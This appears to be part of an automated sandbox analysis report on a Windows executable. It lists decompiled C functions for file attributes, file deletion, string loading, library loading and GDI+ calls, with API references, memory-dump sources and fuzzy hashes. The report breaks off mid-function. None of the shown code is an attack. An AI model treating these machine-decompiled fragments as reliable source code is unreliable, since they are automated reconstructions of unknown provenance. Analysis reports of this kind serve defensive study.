                                                                                                                                                    0x012384b4
                                                                                                                                                    0x012384b9
                                                                                                                                                    0x012384bf
                                                                                                                                                    0x012384bf
                                                                                                                                                    0x012384bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012384bf
                                                                                                                                                    0x012384a7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012384ac
                                                                                                                                                    0x01238496
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 012384A7
                                                                                                                                                      • Part of subcall function 01238398: RtlAllocateHeap.NTDLL(00000000,?,?,?,01233866,?,0000015D,?,?,?,?,01234D42,000000FF,00000000,?,?), ref: 012383CA
                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,0124FF50,0121CD97,?,?,?,?,?,?), ref: 012384E3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2447670028-0
                                                                                                                                                    • Opcode ID: 38b4a2169d028c4a11b8c4153c483cecba4af2ea8a9024a8c248917937d11611
                                                                                                                                                    • Instruction ID: 1b0666125b13bd1f5c4eaf4dea5c32836eb84202f0174d64438f5ea107352e67
                                                                                                                                                    • Opcode Fuzzy Hash: 38b4a2169d028c4a11b8c4153c483cecba4af2ea8a9024a8c248917937d11611
                                                                                                                                                    • Instruction Fuzzy Hash: 1DF062B62316177ADB222A29AC04F7B3B6DEFD1670B15831EFB189E990DA74D50041A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01220866, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E01220866(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}









                                                                                                                                                    0x0122087a
                                                                                                                                                    0x01220882
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220884
                                                                                                                                                    0x01220889
                                                                                                                                                    0x0122088d
                                                                                                                                                    0x01220890
                                                                                                                                                    0x01220892
                                                                                                                                                    0x01220894
                                                                                                                                                    0x01220896
                                                                                                                                                    0x01220896
                                                                                                                                                    0x01220897
                                                                                                                                                    0x01220897
                                                                                                                                                    0x0122089e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012208a0
                                                                                                                                                    0x012208a5

                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 01220873
                                                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 0122087A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1231390398-0
                                                                                                                                                    • Opcode ID: d8d16a38299ad5170efdfa305beebe43c485716940c7dc77e43887fa4e7bab10
                                                                                                                                                    • Instruction ID: a1e795f02cda0dc9ee0e01afdbe4b7683455b769e82a92240ef92a8382a471df
                                                                                                                                                    • Opcode Fuzzy Hash: d8d16a38299ad5170efdfa305beebe43c485716940c7dc77e43887fa4e7bab10
                                                                                                                                                    • Instruction Fuzzy Hash: A3E02B32E2012AF74B2885AEA8088BF77DDDB441007248079FA02C3201F674D90047E6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012377DD, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E012377DD(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}



                                                                                                                                                    0x012377e2

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0123B510: GetEnvironmentStringsW.KERNEL32 ref: 0123B519
                                                                                                                                                      • Part of subcall function 0123B510: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0123B53C
                                                                                                                                                      • Part of subcall function 0123B510: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0123B562
                                                                                                                                                      • Part of subcall function 0123B510: _free.LIBCMT ref: 0123B575
                                                                                                                                                      • Part of subcall function 0123B510: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0123B584
                                                                                                                                                    • _free.LIBCMT ref: 01237823
                                                                                                                                                    • _free.LIBCMT ref: 0123782A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 400815659-0
                                                                                                                                                    • Opcode ID: a8122d337da0ff3dff78d1158244bcb2657d17fde3f0e36373843a0e75e55e62
                                                                                                                                                    • Instruction ID: 70b37148e9c36c8fc799c93552ddac6edd68728b8c1e7e7b61bbfe20ee2c648c
                                                                                                                                                    • Opcode Fuzzy Hash: a8122d337da0ff3dff78d1158244bcb2657d17fde3f0e36373843a0e75e55e62
                                                                                                                                                    • Instruction Fuzzy Hash: CBE022E3A3651345EE32323E7C4463B2640ABE2330F140726F924CB1C1DE60C80781E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121DD3F, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0121DD3F(void* __eflags, int _a4, WCHAR* _a8, int _a12) {
				int _t11;
				void* _t14;
				WCHAR* _t15;

				_t15 = _a8;
				 *_t15 = 0;
				if(E0121D1CA(0x124fee8, _t14, __eflags, _a4, _t15, _a12, 0, 0) == 0) {
					_t11 = LoadStringW( *0x124fed0, _a4, _t15, _a12); // executed
					if(_t11 == 0) {
						LoadStringW( *0x124fed4, _a4, _t15, _a12);
					}
				}
				return _t15;
			}






                                                                                                                                                    0x0121dd43
                                                                                                                                                    0x0121dd52
                                                                                                                                                    0x0121dd60
                                                                                                                                                    0x0121dd6f
                                                                                                                                                    0x0121dd77
                                                                                                                                                    0x0121dd86
                                                                                                                                                    0x0121dd86
                                                                                                                                                    0x0121dd77
                                                                                                                                                    0x0121dd90

                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringW.USER32(00000000,00000096,01220FE6,00000000), ref: 0121DD6F
                                                                                                                                                    • LoadStringW.USER32(00000000,00000096,01220FE6), ref: 0121DD86
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                    • Opcode ID: 93fe6888e0e34a49a4e18924f1b0890eb151965761c9a6d24ddee72a7530bce6
                                                                                                                                                    • Instruction ID: 702c9d38446f6794917b5de5714b1d790596a7dd9bb232bd9fc55f0f582a8895
                                                                                                                                                    • Opcode Fuzzy Hash: 93fe6888e0e34a49a4e18924f1b0890eb151965761c9a6d24ddee72a7530bce6
                                                                                                                                                    • Instruction Fuzzy Hash: B3F01236220259FBCF225FA9FC08DEB7F69FF596917004415FE0496125D2328820EB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121A384, Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E0121A384(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E0122E1C0();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E0121B5AC(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}







                                                                                                                                                    0x0121a38c
                                                                                                                                                    0x0121a391
                                                                                                                                                    0x0121a398
                                                                                                                                                    0x0121a3a0
                                                                                                                                                    0x0121a3a5
                                                                                                                                                    0x0121a3d1
                                                                                                                                                    0x0121a3d1
                                                                                                                                                    0x0121a3da

                                                                                                                                                    APIs
                                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0121A1BA,?,?,?,0121A053,?,00000001,00000000,?,?), ref: 0121A398
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0121A1BA,?,?,?,0121A053,?,00000001,00000000,?,?), ref: 0121A3C9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: ce99c961ccc0521ff9986440ca1a7bfae17b7e07c0921ddc4334061a891a9d21
                                                                                                                                                    • Instruction ID: 1a27217079b6de5a2af6d96ba1120b98437949ce74c8ae8b7afc041e823ede02
                                                                                                                                                    • Opcode Fuzzy Hash: ce99c961ccc0521ff9986440ca1a7bfae17b7e07c0921ddc4334061a891a9d21
                                                                                                                                                    • Instruction Fuzzy Hash: 66F0A03115114ABBDF119F60EC04BE937ADAB14381F448061BD8896154DB7289D9FB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122D3C9, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemText_swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3011073432-0
                                                                                                                                                    • Opcode ID: 583a56a3a297b53752a34694295be773d1218a79aa7fa6ad7ac57c49d79fdcb6
                                                                                                                                                    • Instruction ID: 9faf644bfb25cacda0dbdc3f65856dbde99c62a19e8a512e8a123ea870f78cd9
                                                                                                                                                    • Opcode Fuzzy Hash: 583a56a3a297b53752a34694295be773d1218a79aa7fa6ad7ac57c49d79fdcb6
                                                                                                                                                    • Instruction Fuzzy Hash: 66F0A03256431D7AEB21EBB0EC4AFAE3A6DEB14742F4404A5F600960D1E5725A609762
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121A06D, Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E0121A06D(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E0122E1C0();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E0121B5AC(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}







                                                                                                                                                    0x0121a075
                                                                                                                                                    0x0121a07a
                                                                                                                                                    0x0121a07e
                                                                                                                                                    0x0121a086
                                                                                                                                                    0x0121a08b
                                                                                                                                                    0x0121a0b4
                                                                                                                                                    0x0121a0b4
                                                                                                                                                    0x0121a0bd

                                                                                                                                                    APIs
                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,012197EC,?,?,0121961D), ref: 0121A07E
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,012197EC,?,?,0121961D), ref: 0121A0AC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                    • Opcode ID: 2d9284da5d469d6315e6a3c2ea9ec48d31c1e1a06e6ac9401c82b15f11db69a8
                                                                                                                                                    • Instruction ID: 419696e858384aa85784e4bda9c98490c610a8a4135e2807692a8e7de9fa84ca
                                                                                                                                                    • Opcode Fuzzy Hash: 2d9284da5d469d6315e6a3c2ea9ec48d31c1e1a06e6ac9401c82b15f11db69a8
                                                                                                                                                    • Instruction Fuzzy Hash: 49E02B3415220967DB219E60EC04FF937ECAB24381F480061BD84D7044DB218C94EA61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122A31B, Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E0122A31B(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0x1257430; // 0x74f5c100
				 *0x1242260(_t5, _t13, _t16,  *[fs:0x0], E01241E4C, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L0122E09A(); // executed
				_t8 =  *0x1271170( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}









                                                                                                                                                    0x0122a32c
                                                                                                                                                    0x0122a333
                                                                                                                                                    0x0122a344
                                                                                                                                                    0x0122a34a
                                                                                                                                                    0x0122a34f
                                                                                                                                                    0x0122a354
                                                                                                                                                    0x0122a35e
                                                                                                                                                    0x0122a369

                                                                                                                                                    APIs
                                                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,01241E4C,000000FF), ref: 0122A34F
                                                                                                                                                    • OleUninitialize.OLE32(?,?,?,?,01241E4C,000000FF), ref: 0122A354
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3856339756-0
                                                                                                                                                    • Opcode ID: c0999faa02a38fb3ec7ac1df913981350b172ecd63c6833b941e800c2e16f7b5
                                                                                                                                                    • Instruction ID: 1d4e6bfb86245de570ce2626a0369013a3b3a52dba290bc9b738befa805904e6
                                                                                                                                                    • Opcode Fuzzy Hash: c0999faa02a38fb3ec7ac1df913981350b172ecd63c6833b941e800c2e16f7b5
                                                                                                                                                    • Instruction Fuzzy Hash: 90F03936664654EBC721EB5AE809B1AFBA9FB49A20F00436AF41993750CB746811CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121A0D4, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0121A0D4(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E0122E1C0();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E0121B5AC(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}







                                                                                                                                                    0x0121a0dc
                                                                                                                                                    0x0121a0e5
                                                                                                                                                    0x0121a0eb
                                                                                                                                                    0x0121a0f0
                                                                                                                                                    0x0121a111
                                                                                                                                                    0x0121a117
                                                                                                                                                    0x0121a117
                                                                                                                                                    0x0121a11f

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0121A0C9,?,0121768B,?,?,?,?), ref: 0121A0E5
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0121A0C9,?,0121768B,?,?,?,?), ref: 0121A111
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: ecaa4ea808c267eb0534c86e1014569d62e5d132b2ace46a78f0a9424a10f871
                                                                                                                                                    • Instruction ID: d2714b1038a37579a14b7cc178553f2b3ed14492f02cdcc7e453dea1210a811e
                                                                                                                                                    • Opcode Fuzzy Hash: ecaa4ea808c267eb0534c86e1014569d62e5d132b2ace46a78f0a9424a10f871
                                                                                                                                                    • Instruction Fuzzy Hash: 46E09B35510128A7CB21EA78EC04BE977EDDB183E1F004171FE54D3184D6705D849BD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121FFE3, Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0121FFE3(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E0122E1C0();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E0121B8A5( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}





                                                                                                                                                    0x0121ffeb
                                                                                                                                                    0x0121fffe
                                                                                                                                                    0x01220006
                                                                                                                                                    0x01220014
                                                                                                                                                    0x01220020
                                                                                                                                                    0x01220020
                                                                                                                                                    0x0122002a

                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0121FFFE
                                                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0121EAC6,Crypt32.dll,00000000,0121EB4A,?,?,0121EB2C,?,?,?), ref: 01220020
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1175261203-0
                                                                                                                                                    • Opcode ID: 62bcf173efdb11a6e70fd21ca30e141ed2bf495813fffb915dcba1f5a575d6e1
                                                                                                                                                    • Instruction ID: 5d4d99cbf67ba64fef5c203722968c3b8af60814dadd68e345afd13ea0cea50d
                                                                                                                                                    • Opcode Fuzzy Hash: 62bcf173efdb11a6e70fd21ca30e141ed2bf495813fffb915dcba1f5a575d6e1
                                                                                                                                                    • Instruction Fuzzy Hash: 45E01B7591012CABEB219A95EC08FEA77ACEF1D381F440065B944D2004D6749940CBB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01229A7F, Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E01229A7F(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0x1243670;
				if(_a8 == 0) {
					L0122E082(); // executed
				} else {
					L0122E088();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}






                                                                                                                                                    0x01229a82
                                                                                                                                                    0x01229a84
                                                                                                                                                    0x01229a86
                                                                                                                                                    0x01229a89
                                                                                                                                                    0x01229a8c
                                                                                                                                                    0x01229a94
                                                                                                                                                    0x01229a95
                                                                                                                                                    0x01229a98
                                                                                                                                                    0x01229a9e
                                                                                                                                                    0x01229aa7
                                                                                                                                                    0x01229aa0
                                                                                                                                                    0x01229aa0
                                                                                                                                                    0x01229aa0
                                                                                                                                                    0x01229aac
                                                                                                                                                    0x01229ab2
                                                                                                                                                    0x01229abb

                                                                                                                                                    APIs
                                                                                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 01229AA0
                                                                                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 01229AA7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BitmapCreateFromGdipStream
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1918208029-0
                                                                                                                                                    • Opcode ID: a6e6b8b0d57ef2c09ec555630da4313a44225dbe8cc48eeccdbb25607a30a255
                                                                                                                                                    • Instruction ID: 262756aaeb3a1bc190250938549a1c342170da95c20bd8abbbdf5d3ad8e71916
                                                                                                                                                    • Opcode Fuzzy Hash: a6e6b8b0d57ef2c09ec555630da4313a44225dbe8cc48eeccdbb25607a30a255
                                                                                                                                                    • Instruction Fuzzy Hash: E6E01271921329FFDF14DF98C9007ADB7F8EB08215F60815BE89993300D6B56F449BA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01231FAC, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E01231FAC(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E012330D7(__eflags, E01231EF0); // executed
